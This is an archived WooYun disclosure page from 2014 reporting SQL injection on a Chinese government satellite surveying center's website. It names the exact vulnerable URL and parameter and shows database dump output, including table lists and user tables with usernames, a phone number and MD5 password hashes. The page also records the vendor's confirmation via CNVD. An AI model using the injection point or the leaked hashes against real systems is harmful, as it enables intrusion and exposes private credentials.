当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-054150

漏洞标题:国家测绘地理信息局卫星测绘应用中心SQL注射

相关厂商:国家测绘地理信息局卫星测绘应用中心

漏洞作者: 雅柏菲卡

提交时间:2014-03-25 14:35

修复时间:2014-05-09 14:36

公开时间:2014-05-09 14:36

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-03-25: 细节已通知厂商并且等待厂商处理中
2014-03-29: 厂商已经确认,细节仅向厂商公开
2014-04-08: 细节向核心白帽子及相关领域专家公开
2014-04-18: 细节向普通白帽子公开
2014-04-28: 细节向实习白帽子公开
2014-05-09: 细节向公众公开

简要描述:

..

详细说明:

....

漏洞证明:

http://www.sasmac.cn/portal_space/search.view?Submit=88952634(可以为任何数 测试时去掉括号里的内容和括号)&condition=Search 注射点 
available databases [8]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] MH_U19
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] WMSYS
Database: MH_U19
[94 tables]
+--------------------------------+
| "DR$IDX_ARITCLE_CONTENT$I" |
| "DR$IDX_ARITCLE_CONTENT$K" |
| "DR$IDX_ARITCLE_CONTENT$N" |
| "DR$IDX_ARITCLE_CONTENT$P" |
| "DR$IDX_ARITCLE_CONTENT$R" |
| TB_BUSINESS_ISSMTA |
| TB_CMS_ARTICLE_INFO |
| TB_CMS_BUSSTYPE_LIST |
| TB_CMS_CACHESET |
| TB_CMS_CHANNEL_BUSSTYPE |
| TB_CMS_CHANNEL_INFO |
| TB_CMS_COMPLEX_CHANNEL |
| TB_CMS_CUSTOMCHANNEL_CHANNEL |
| TB_CMS_CUSTOMCHANNEL_PROPERTY |
| TB_CMS_CUSTOMLIST |
| TB_CMS_CUSTOMLIST_01 |
| TB_CMS_CUSTOMLIST_02 |
| TB_CMS_CUSTOMLIST_03 |
| TB_CMS_CUSTOMLIST_04 |
| TB_CMS_CUSTOMLIST_05 |
| TB_CMS_CUSTOMLIST_06 |
| TB_CMS_CUSTOMLIST_07 |
| TB_CMS_CUSTOMLIST_08 |
| TB_CMS_CUSTOMLIST_09 |
| TB_CMS_CUSTOMLIST_10 |
| TB_CMS_CUSTOMLIST_PROPERTY |
| TB_CMS_CUSTOMLIST_PROPERTY_01 |
| TB_CMS_CUSTOMLIST_PROPERTY_02 |
| TB_CMS_CUSTOMLIST_PROPERTY_03 |
| TB_CMS_CUSTOMLIST_PROPERTY_04 |
| TB_CMS_CUSTOMLIST_PROPERTY_05 |
| TB_CMS_CUSTOMLIST_PROPERTY_06 |
| TB_CMS_CUSTOMLIST_PROPERTY_07 |
| TB_CMS_CUSTOMLIST_PROPERTY_08 |
| TB_CMS_CUSTOMLIST_PROPERTY_09 |
| TB_CMS_CUSTOMLIST_PROPERTY_10 |
| TB_CMS_EMERGENCY_CATEGORY |
| TB_CMS_EMERGENCY_RESPONSE |
| TB_CMS_EMERGENCY_TAILOR |
| TB_CMS_FILES_INFO |
| TB_CMS_FILE_SORT |
| TB_CMS_FOLDER_INFO |
| TB_CMS_INTEGERMENU |
| TB_CMS_MIDDLE_COMPLEXCHANNEL |
| TB_CMS_OPERATE_LOG |
| TB_CMS_OPERATE_RECORD |
| TB_CMS_PLUGIN_FRIENDLINKS |
| TB_CMS_PLUGIN_FRIENDLINKS_TYPE |
| TB_CMS_PUBLISH_RECORD |
| TB_CMS_RSSREAD_DETAIL |
| TB_CMS_RSSREAD_RULE |
| TB_CMS_SITE_INFO |
| TB_CMS_SITE_MENU_NAVIGATE |
| TB_CMS_SPECIAL_INFO |
| TB_CMS_SPE_ARTICLE |
| TB_CMS_SURVEY |
| TB_CMS_SURVEY_HISTORY |
| TB_CMS_SURVEY_TYPE |
| TB_CMS_TEMPLATE_INFO |
| TB_CMS_TEMPLATE_POLICY |
| TB_CMS_VISIT_DATA |
| TB_DIRSHARE_CATEGORY |
| TB_DIRSHARE_PICK_RULES |
| TB_DIRSHARE_PICK_SOURCE |
| TB_FILES_ARTICLE |
| TB_FILES_INFO |
| TB_SPACE_THEME |
| TB_SPACE_THEME_TYPE |
| TB_SPACE_USERSPACE |
| TB_SPACE_USERSPACE_BACKUP |
| TB_SPACE_USER_MODULE_PREF |
| TB_SYSTEM_BACKUP_DB |
| TB_SYSTEM_BACKUP_FILE |
| TB_SYSTEM_CONFIG |
| TB_SYSTEM_LABEL |
| TB_SYSTEM_LOG |
| TB_SYSTEM_USERLOGIN |
| TB_UIM_DEPART |
| TB_UIM_MODULE |
| TB_UIM_ROLE |
| TB_UIM_ROLECHANNEL |
| TB_UIM_ROLEINTEGERMENU |
| TB_UIM_ROLEMODULE |
| TB_UIM_ROLESITE |
| TB_UIM_ROLESPECIAL |
| TB_UIM_SSO_ORGANIZATION |
| TB_UIM_SSO_USER |
| TB_UIM_USER |
| TB_UIM_USERCHANNEL |
| TB_UIM_USERINTEGERMENU |
| TB_UIM_USERMODULE |
| TB_UIM_USERROLE |
| TB_UIM_USERSITE |
| TB_UIM_USERSPECIAL |
+--------------------------------+
Database: MH_U19
Table: TB_UIM_USER
[3 entries]
+-----------+------+-------+--------+--------------+-------+-------+--------------+----------------------------------+------------+----------+----------+
| ADD_TIME | CA | EMAIL | ISLOCK | ISPORTALUSER | MEMO | ORGID | PHONE | PWD | SYSTEM_KEY | USERID | USERNAME |
+-----------+------+-------+--------+--------------+-------+-------+--------------+----------------------------------+------------+----------+----------+
| NULL | true | None | 0 | NULL | cas用户 | 0 | NULL | 698d51a19d8a121ce581499d7b701668 | NULL | admin | NULL |
| 04-11月-07 | NULL | None | 0 | 1 | admin | 0 | 010-63881440 | 21232f297a57a5a743894a0e4a801fc3 | NULL | guest | 超级管理员
| 29-5月 -08 | NULL | NULL | 0 | 1 | NULL | 0 | NULL | guest | NULL | xuyanhui | guest |
+-----------+------+-------+--------+--------------+-------+-------+--------------+----------------------------------+------------+----------+----------+
Database: MH_U19
Table: TB_UIM_SSO_USER
[11 entries]
+-------+--------+----------------------------------+----------------------------------+----------+
| EMAIL | ORGID | PWD | STEALTH | USERID |
+-------+--------+----------------------------------+----------------------------------+----------+
| None | 111111 | 57cb5a26334a6c1d5e27c49def4a0f0d | NULL | 11111 |
| None | 111111 | 89975c5e5d407916e8080d137c48ddd7 | NULL | 22222 |
| None | 111111 | 21232f297a57a5a743894a0e4a801fc3 | 3a589e5d3cceb0e3b7d902887a8f6574 | aaaaa |
| NULL | 111111 | 21232f297a57a5a743894a0e4a801fc3 | NULL | admin |
| None | 111111 | 8997130e9e3b4c11009d72c657acf769 | NULL | cheng |
| None | 111111 | 33e79a5af876e532120c36aebb752963 | NULL | guest |
| None | 111111 | ad0234829205b9033196ba818f7a872b | NULL | register |
| None | 111111 | 9de4a97425678c5b1288aa70c1669a64 | NULL | test1 |
| None | 111111 | 594f803b380a41396ed63dca39503542 | NULL | test2 |
| None | 111111 | b0baee9d279d34fa1dfd71aadb908c3f | NULL | tester |
| None | 111111 | 3d2172418ce305c7d16d4b05597c6a59 | NULL | yang |
+-------+--------+----------------------------------+----------------------------------+----------+

修复方案:

.................

版权声明:转载请注明来源 雅柏菲卡@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-03-29 21:49

厂商回复:

CNVD确认并复现所述情况,已经由CNVD直接通报网站管理方以及后续获知的网站软件生产厂商。

最新状态:

暂无